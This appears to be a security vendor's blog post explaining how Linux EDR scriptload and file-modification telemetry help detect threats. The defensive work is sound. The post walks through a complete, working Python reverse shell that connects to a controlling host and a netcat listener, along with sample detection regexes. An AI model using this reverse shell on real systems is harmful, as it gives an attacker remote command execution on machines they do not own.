Red Canary’s Linux EDR provides comprehensive protection across your Linux environments by helping to identify and stop runtime threats. Built from the ground up for Linux, our sensor is designed to minimize performance impact while tracking the unique sets of threats that Linux faces. This blog will demonstrate how combining various types of data allows us to have higher-fidelity detection capabilities and better serve and protect our customers.
Insights from scriptload data
Endpoint detection and response (EDR) products generally provide a process-centric view of events that happen on an endpoint. This means that they try to provide data around process activity and metadata. This, however, does not paint the whole picture or provide the full context. In some cases, greater context is needed around some of the events that processes generate.
One example of this is scriptload data. Scriptload data is information about a script that is run: the hash of the script, its name and path, and even its contents. A script could be written in Perl, Python, Bash, or any other language whose files are interpreted.
Linux EDR has the ability to not just report that a script was run but also collect the contents of the script as well as metadata around it. It can do this for scripts that are run on the host and scripts that are run inside of containers.
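To make the fields above concrete, here is a minimal sketch of what gathering scriptload data for a single file could look like. The `ScriptloadRecord` shape and the `collect_scriptload` function are hypothetical names chosen for illustration; they are not the sensor's actual schema or implementation.

```python
import hashlib
from dataclasses import dataclass
from pathlib import Path


@dataclass
class ScriptloadRecord:
    """Hypothetical record shape; not the sensor's actual schema."""
    path: str
    name: str
    sha256: str
    interpreter: str
    contents: str


def collect_scriptload(script_path: str) -> ScriptloadRecord:
    """Gather the hash, name, path, shebang interpreter, and contents of a script."""
    path = Path(script_path).resolve()
    raw = path.read_bytes()
    text = raw.decode("utf-8", errors="replace")
    first_line = text.splitlines()[0] if text else ""
    # A shebang line ("#!") names the interpreter; otherwise leave it empty.
    interpreter = first_line[2:].strip() if first_line.startswith("#!") else ""
    return ScriptloadRecord(
        path=str(path),
        name=path.name,
        sha256=hashlib.sha256(raw).hexdigest(),
        interpreter=interpreter,
        contents=text,
    )
```

Hashing the raw bytes rather than the decoded text keeps the hash stable even when a script contains bytes that are not valid UTF-8.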
Why does getting this extra information matter?
- We can see exactly what a script is doing and correlate other events with the process.
- We can see any built-in commands that an interpreter might use. This will vary widely based on what type of script is being run.
- It allows us to tell a better story when it comes to writing a detection report or trying to perform threat hunting around this event.
Analyzing a Python reverse shell
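To demonstrate why the extra context here is important, let’s look at an example of a script that creates a reverse shell on a machine. Reverse shells are a common tool for adversaries: the target machine connects out to a machine the adversary controls, and the adversary then runs commands on the target over that connection.
[Figure: a reverse shell in three steps (Step 1, Step 2, Step 3)]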
Now let’s break down the script that creates a reverse shell into its relevant components:
First, we need to import any relevant dependencies.
#! /usr/bin/python3
import socket,subprocess,os,pty
Next, we will create a TCP socket and attempt to connect to the machine that will be used as the controlling machine.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.181.130",12345))
Then, we will map the socket file descriptor to stdin, stdout, and stderr.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
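The effect of `os.dup2` can be seen in isolation with a harmless sketch. The example below is an illustration only: it uses a local `socket.socketpair()` in place of a network connection, redirects just file descriptor 1, and restores it afterwards. The function name `demo_dup2_redirect` is made up for this example.

```python
import os
import socket


def demo_dup2_redirect() -> bytes:
    """Show that after os.dup2, writes to fd 1 arrive on a socket."""
    # A local socket pair stands in for the network connection.
    ours, peer = socket.socketpair()
    saved_stdout = os.dup(1)          # keep a copy so stdout can be restored
    try:
        os.dup2(ours.fileno(), 1)     # fd 1 now refers to the socket
        os.write(1, b"hello from fd 1\n")
    finally:
        os.dup2(saved_stdout, 1)      # put the real stdout back
        os.close(saved_stdout)
    data = peer.recv(1024)
    ours.close()
    peer.close()
    return data
```

The bytes written to descriptor 1 are read back from the other end of the socket pair, which is the same mechanism the reverse shell relies on for all three standard descriptors.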
Finally, the script starts an interactive shell. Since we mapped the file descriptors to the socket, this will allow stdin, stdout, and stderr to go through the socket.
pty.spawn("/bin/sh")
Before running the script, we set up a netcat listener on another machine using the following command:
$ nc -l 12345
Now, we run the Python script as follows:
$ ./reverse.py
At this point, the user on the machine where we ran netcat should be able to run commands as if they were in a terminal on the target machine.
The view from Linux EDR
Now let’s dive into how Linux EDR views the telemetry generated by commands that are issued from the adversary’s machine but run on the target machine. In the process tree, each command that is executed appears as a child of sh, not of the Python reverse shell. This can be further muddled if the attacker then starts another shell or a series of commands that creates many child and grandchild processes.
When writing detection logic for process events, analysts often include process path, process name, command-line parameters, and so on. In our example here, we would see a process start event for python3 with no command-line arguments. We would see a process start for sh with no command-line arguments. You might assume a Python process spawning a shell is unusual, but you would quickly find it is not uncommon at all. Or maybe you would try to correlate network data with the process, such as the Python process connecting to an IP address and port and also spawning a shell. But knowing only that a Python process made a connection at some point and spawned a shell at some point does not indicate much.
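The weakness of a rule built only on process names and ancestry can be sketched in a few lines. The `ProcessStart` type, the rule, and both events below are hypothetical and simplified for illustration; they are not real telemetry or Red Canary detection logic.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStart:
    """Hypothetical, simplified process start event."""
    parent_name: str
    name: str
    cmdline: tuple


def python_spawns_shell(event: ProcessStart) -> bool:
    """Naive rule: a Python interpreter starts a shell."""
    return event.parent_name.startswith("python") and event.name in {"sh", "bash"}


# Illustrative events only; neither is real telemetry.
reverse_shell = ProcessStart("python3", "sh", ())
# For example, a maintenance script that shells out to list a directory.
benign_tool = ProcessStart("python3", "sh", ("-c", "ls /tmp"))

matches = [python_spawns_shell(e) for e in (reverse_shell, benign_tool)]
```

The rule fires on both events, so on its own it cannot separate the reverse shell from routine automation.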
Instead of relying on attributes of process events or their ancestry or even the more advanced approach of associating network activity with process data, what if we could examine the script itself?
Examining scriptload data
Within the contents of the Python script, we could potentially capture valuable information such as the IP address and port. In our example they were hardcoded, but even if they weren’t, we could see where the values came from and likely be able to extrapolate the final address and port. Next, we would be able to see that the adversary is mapping stdin, stdout, and stderr to the socket that was created and then immediately spawning a shell. This is powerful evidence that this Python script is intended to create a reverse shell.
With just process data or even surrounding data, it was hard (or maybe even impossible) to see that the socket was being mapped to the file descriptors before the shell was spawned. We can create alerts off of this information and then allow other associations to be made as the timeline of events is stitched together.
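As a rough sketch of how script contents could feed an alert, the function below looks for the three signals described above: a hardcoded connect target, `os.dup2` calls covering descriptors 0, 1, and 2, and a shell being spawned. The regular expressions and the `analyze_script` name are assumptions made for illustration. They match the style of the example script only and are far too narrow for production detection.

```python
import re

# Patterns are illustrative assumptions, not production detection logic.
CONNECT_RE = re.compile(r"\.connect\(\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d+)\s*\)\)")
DUP2_RE = re.compile(r"os\.dup2\([^,]+,\s*([012])\s*\)")
SHELL_RE = re.compile(r"(?:pty\.spawn|subprocess\.\w+|os\.system)\(.*?/bin/(?:ba)?sh")


def analyze_script(contents: str) -> dict:
    """Return reverse-shell indicators found in Python script contents."""
    connect = CONNECT_RE.search(contents)
    redirected = {int(fd) for fd in DUP2_RE.findall(contents)}
    spawns_shell = bool(SHELL_RE.search(contents))
    return {
        # Hardcoded (host, port) passed to connect(), if any.
        "remote": (connect.group(1), int(connect.group(2))) if connect else None,
        "redirected_fds": sorted(redirected),
        "spawns_shell": spawns_shell,
        # All three signals together are the strong indicator.
        "likely_reverse_shell": bool(connect)
        and redirected == {0, 1, 2}
        and spawns_shell,
    }
```

Requiring all three signals together reflects the reasoning in the text: a connection or a spawned shell alone says little, while a socket mapped onto the standard descriptors just before a shell starts is hard to explain innocently.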
This knowledge also allows us to confidently correlate that shell process with commands from a reverse shell. Threat hunting will be a lot easier now that we’ve identified that subsequent commands are originating from a reverse shell.
Examining file modifications
Much as with scriptload data, we can also gain useful insight by analyzing file modification (filemod) telemetry. We consider file modification to be file creation, deletion, renaming, and editing. It is beneficial to analyze not only how a process was started and in what context, but also which resources on the system it may have created or modified. Since everything is a file on Linux, being able to see which files were created, deleted, edited, or renamed gives crucial insight into what an adversary may have been attempting to do. For example, if we suspect an attack has occurred, seeing suspicious processes creating cron jobs or systemd unit files would indicate the adversary was trying to establish persistence (T1053.003 and T1543.002). Finally, filemod data allows us to better help customers during the remediation process when an attack has occurred.
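The persistence example can be sketched as a simple lookup from a modified path to the technique it suggests. The action names, the `persistence_technique` function, and the path list are assumptions for illustration. The paths are common Linux defaults, not an exhaustive or vendor-supplied list.

```python
from typing import Optional

# Path prefixes are common Linux defaults; the mapping is an illustrative assumption.
PERSISTENCE_PATHS = {
    "T1053.003": ("/etc/crontab", "/etc/cron.d/", "/var/spool/cron/"),
    "T1543.002": ("/etc/systemd/system/", "/usr/lib/systemd/system/"),
}
# Hypothetical action names for filemod events that write or place a file.
WRITE_ACTIONS = {"create", "edit", "rename"}


def persistence_technique(action: str, path: str) -> Optional[str]:
    """Map a filemod event to a persistence technique ID, or None if no match."""
    if action not in WRITE_ACTIONS:
        return None
    for technique, prefixes in PERSISTENCE_PATHS.items():
        # str.startswith accepts a tuple of candidate prefixes.
        if path.startswith(prefixes):
            return technique
    return None
```

A match here is only a lead: package managers and administrators write to these locations too, so the result is most useful when combined with the process context discussed earlier.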
Conclusion
The inclusion of scriptload and filemod telemetry significantly enhances our ability to detect and defend against unique Linux threats. These data sources provide information and context that process data doesn’t provide on its own, such as hardcoded values that reveal where activity originates, or suspicious activity around files. With this powerful combination, we are better able to identify malicious behaviors with higher precision.